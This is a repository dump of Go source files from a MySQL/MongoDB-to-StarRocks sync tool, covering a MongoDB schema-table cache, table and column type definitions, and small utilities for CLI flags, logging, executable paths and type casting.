&config.MongoConfig{} 42 | err := mapstructure.Decode(pluginConfig["source"], mts.MongoConfig) 43 | if err != nil { 44 | log.Fatal("new schema tables config parsing failed. err: %v", err.Error()) 45 | } 46 | // init conn 47 | uri := fmt.Sprintf("mongodb://%s:%s@%s", mts.UserName, mts.Password, mts.Uri) 48 | mts.ctx, mts.cancel = context.WithTimeout(context.Background(), 10*time.Second) 49 | mts.conn, err = mongo.Connect(mts.ctx, options.Client().ApplyURI(uri)) 50 | if err != nil { 51 | log.Fatal("new schema tables conn failed. err: ", err.Error()) 52 | } 53 | // TODO LoadMeta 54 | } 55 | 56 | func (mts *MongoTables) AddTableForMsg(msg *msg.Msg) error { 57 | key := fmt.Sprintf("%s.%s", msg.Database, msg.Table) 58 | mts.tablesLock.RLock() 59 | t, ok := mts.tables[key] 60 | mts.tablesLock.RUnlock() 61 | 62 | if ok { 63 | ta := &Table{ 64 | Schema: msg.Database, 65 | Name: msg.Table, 66 | Columns: make([]TableColumn, 0, 16), 67 | } 68 | mts.getColumns(ta, msg.DmlMsg.Data) 69 | if reflect.DeepEqual(t.Columns, ta.Columns) { 70 | return nil 71 | } 72 | mts.unionColumns(t, ta) 73 | return nil 74 | } 75 | 76 | // add coll to colls 77 | ta := &Table{ 78 | Schema: msg.Database, 79 | Name: msg.Table, 80 | Columns: make([]TableColumn, 0, 16), 81 | } 82 | mts.getColumns(ta, msg.DmlMsg.Data) 83 | mts.tablesLock.RLock() 84 | mts.tables[key] = ta 85 | mts.tablesLock.RUnlock() 86 | return nil 87 | } 88 | 89 | func (mts *MongoTables) AddTable(db string, table string) (*Table, error) { 90 | return nil, nil 91 | } 92 | 93 | func (mts *MongoTables) DelTable(db string, table string) error { 94 | return nil 95 | } 96 | 97 | func (mts *MongoTables) UpdateTable(db string, table string, args interface{}, pos string, index int) (err error) { 98 | return nil 99 | } 100 | 101 | func (mts *MongoTables) GetTable(db string, table string) (*Table, error) { 102 | key := fmt.Sprintf("%s.%s", db, table) 103 | mts.tablesLock.RLock() 104 | t, ok := mts.tables[key] 105 | mts.tablesLock.RUnlock() 106 | if 
ok { 107 | return t, nil 108 | } 109 | return nil, errors.New("get table meta missing") 110 | } 111 | 112 | func (mts *MongoTables) RefreshTable(db string, table string) { 113 | //TODO 114 | } 115 | 116 | func (mts *MongoTables) Close() { 117 | mts.cancel() 118 | err := mts.conn.Disconnect(context.TODO()) 119 | if err != nil { 120 | log.Fatalf("schema tables close conn failed: %v", err.Error()) 121 | } 122 | log.Infof("schema tables conn is closed") 123 | } 124 | 125 | func (mts *MongoTables) getColumns(table *Table, data map[string]interface{}) { 126 | for k := range data { 127 | table.Columns = append(table.Columns, TableColumn{Name: k}) 128 | } 129 | } 130 | 131 | func (mts *MongoTables) unionColumns(cacheTable *Table, msgTable *Table) { 132 | columnsMap := make(map[string]bool) 133 | for _, c := range cacheTable.Columns { 134 | columnsMap[c.Name] = true 135 | } 136 | for _, c := range msgTable.Columns { 137 | if _, ok := columnsMap[c.Name]; !ok { 138 | columnsMap[c.Name] = true 139 | cacheTable.Columns = append(cacheTable.Columns, c) 140 | } 141 | } 142 | } 143 | 144 | func (mts *MongoTables) SaveMeta(data string) error { 145 | return nil 146 | } 147 | -------------------------------------------------------------------------------- /pkg/schema/schema.go: -------------------------------------------------------------------------------- 1 | package schema 2 | 3 | import ( 4 | "encoding/json" 5 | "github.com/juju/errors" 6 | "github.com/siddontang/go-log/log" 7 | ) 8 | 9 | type ColumnType = int 10 | 11 | const ( 12 | TypeNumber ColumnType = iota + 1 // tinyint, smallint, int, bigint, year 13 | TypeMediumInt // medium int 14 | TypeFloat // float, double 15 | TypeEnum // enum 16 | TypeSet // set 17 | TypeString // other 18 | TypeDatetime // datetime 19 | TypeTimestamp // timestamp 20 | TypeDate // date 21 | TypeTime // time 22 | TypeBit // bit 23 | TypeJson // json 24 | TypeDecimal // decimal 25 | TypeBinary // binary 26 | ) 27 | 28 | type Table struct { 29 | Schema 
string `toml:"schema" json:"schema"` 30 | Name string `toml:"name" json:"name"` 31 | Comment string `toml:"comment" json:"comment"` 32 | Columns []TableColumn `toml:"columns" json:"columns"` 33 | PrimaryKeyColumns []TableColumn `toml:"primary_key_columns" json:"primary_key_columns"` 34 | } 35 | 36 | type TableColumn struct { 37 | Name string `toml:"name" json:"name"` 38 | Type ColumnType `toml:"type" json:"type"` 39 | RawType string `toml:"raw_type" json:"raw_type"` 40 | Comment string `toml:"comment" json:"comment"` 41 | IsPrimaryKey bool `toml:"is_primary_key" json:"is_primary_key"` 42 | } 43 | 44 | type DdlStatement struct { 45 | Schema string `toml:"schema" json:"schema"` 46 | Name string `toml:"name" json:"name"` 47 | RawSql string `toml:"raw_sql" json:"raw_sql"` 48 | IsCreateTable bool `toml:"is_create_table" json:"is_create_table"` 49 | IsLikeCreateTable bool `toml:"is_like_create_table" json:"is_like_create_table"` 50 | ReferTable struct { 51 | Schema string `toml:"schema" json:"schema"` 52 | Name string `toml:"name" json:"name"` 53 | } `toml:"refer_table" json:"refer_table"` 54 | IsSelectCreateTable bool `toml:"is_select_create_table" json:"is_select_create_table"` 55 | SelectRawSql string `toml:"select_raw_sql" json:"select_raw_sql"` 56 | IsDropTable bool `toml:"is_drop_table" json:"is_drop_table"` 57 | IsRenameTable bool `toml:"is_rename_table" json:"is_rename_table"` 58 | } 59 | 60 | func (t *Table) GetTableColumnsName() []string { 61 | columns := make([]string, 0, 16) 62 | for _, column := range t.Columns { 63 | columns = append(columns, column.Name) 64 | } 65 | return columns 66 | } 67 | 68 | func (t *Table) FindColumn(name string) int { 69 | for i, col := range t.Columns { 70 | if col.Name == name { 71 | return i 72 | } 73 | } 74 | return -1 75 | } 76 | 77 | func (t *Table) DelColumn(name string) error { 78 | colIndex := t.FindColumn(name) 79 | if colIndex > -1 { 80 | t.Columns = append(t.Columns[:colIndex], t.Columns[colIndex+1:]...) 
81 | log.Infof("table: %s.%s delete column: %s", t.Schema, t.Name, name) 82 | return nil 83 | } 84 | return errors.New("column: %s not found") 85 | } 86 | 87 | func (t *Table) ToString() string { 88 | if t == nil { 89 | return "" 90 | } 91 | marshal, err := json.Marshal(t) 92 | if err != nil { 93 | return "" 94 | } 95 | return string(marshal) 96 | } 97 | -------------------------------------------------------------------------------- /pkg/utils/file_path.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "github.com/siddontang/go-log/log" 5 | "os" 6 | "path/filepath" 7 | ) 8 | 9 | func GetExecPath() string { 10 | ex, err := os.Executable() 11 | if err != nil { 12 | log.Fatal("get exec path error: ", err) 13 | } 14 | exPath := filepath.Dir(ex) 15 | return exPath 16 | } 17 | -------------------------------------------------------------------------------- /pkg/utils/help.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "flag" 5 | "github.com/go-demo/version" 6 | "github.com/siddontang/go-log/log" 7 | "os" 8 | "path/filepath" 9 | ) 10 | 11 | type Help struct { 12 | printVersion bool 13 | ConfigFile *string 14 | LogLevel *string 15 | LogFile *string 16 | OutputType *string 17 | Daemon *bool 18 | HttpPort *int 19 | } 20 | 21 | func HelpInit() *Help { 22 | var help Help 23 | help.ConfigFile = flag.String("config", "", "go-mysql-starrocks config file") 24 | help.LogLevel = flag.String("level", "info", "log level") 25 | help.LogFile = flag.String("log-file", "go_mysql_sr.log", "log file path") 26 | help.OutputType = flag.String("type", "starrocks", "output type: starrocks, output") 27 | help.Daemon = flag.Bool("daemon", false, "daemon run, must include param 'log-file'") 28 | help.HttpPort = flag.Int("http-port", 6166, "http monitor port, curl http://localhost:6166/metrics") 29 | flag.BoolVar(&help.printVersion, "version", 
false, "print program build version") 30 | flag.Parse() 31 | // 这个需要放在第一个判断 32 | if help.printVersion { 33 | version.PrintVersion() 34 | os.Exit(0) 35 | } 36 | if *help.ConfigFile == "" { 37 | log.Infof("-config param does not exist!") 38 | os.Exit(0) 39 | } else { 40 | abs, err := filepath.Abs(*help.ConfigFile) 41 | if err != nil { 42 | log.Fatal("-config abs error: ", err.Error()) 43 | } 44 | *help.ConfigFile = abs 45 | } 46 | if *help.OutputType != "starrocks" && *help.OutputType != "output" { 47 | log.Infof("-type param value is wrong, see help!") 48 | os.Exit(0) 49 | } 50 | if *help.Daemon { 51 | if *help.LogFile == "" { 52 | log.Infof("daemon mode, must include -log-file param!") 53 | os.Exit(0) 54 | } 55 | } 56 | return &help 57 | } 58 | -------------------------------------------------------------------------------- /pkg/utils/log.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "github.com/siddontang/go-log/log" 5 | "os" 6 | "path/filepath" 7 | ) 8 | 9 | func LogInit(help *Help) *log.Logger { 10 | var l *log.Logger 11 | if *help.LogFile != "" { 12 | // 写入文件 13 | abs, err := filepath.Abs(*help.LogFile) 14 | if err != nil { 15 | log.Fatal("log-file abs error: ", err.Error()) 16 | } 17 | *help.LogFile = abs 18 | logH, _ := log.NewFileHandler(*help.LogFile, os.O_CREATE|os.O_WRONLY|os.O_APPEND) 19 | l = log.NewDefault(logH) 20 | } else { 21 | // 输出到控制台 22 | logH, _ := log.NewStreamHandler(os.Stdout) 23 | l = log.NewDefault(logH) 24 | } 25 | log.SetDefaultLogger(l) 26 | log.SetLevelByName(*help.LogLevel) 27 | return l 28 | } 29 | -------------------------------------------------------------------------------- /pkg/utils/type_cast.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "github.com/juju/errors" 5 | "reflect" 6 | ) 7 | 8 | func CastToSlice(arg interface{}) (out []interface{}, ok bool) { 9 | slice, success := 
TakeArg(arg, reflect.Slice) 10 | if !success { 11 | ok = false 12 | return 13 | } 14 | c := slice.Len() 15 | out = make([]interface{}, c) 16 | for i := 0; i < c; i++ { 17 | out[i] = slice.Index(i).Interface() 18 | } 19 | return out, true 20 | } 21 | 22 | func TakeArg(arg interface{}, kind reflect.Kind) (val reflect.Value, ok bool) { 23 | val = reflect.ValueOf(arg) 24 | if val.Kind() == kind { 25 | ok = true 26 | } 27 | return 28 | } 29 | 30 | func CastSliceInterfaceToSliceString(a []interface{}) ([]string, error) { 31 | aStrings := make([]string, len(a)) 32 | for i, c := range a { 33 | name, ok := c.(string) 34 | if !ok { 35 | return nil, errors.Trace(errors.New("should be an array of string")) 36 | } 37 | aStrings[i] = name 38 | } 39 | return aStrings, nil 40 | } 41 | --------------------------------------------------------------------------------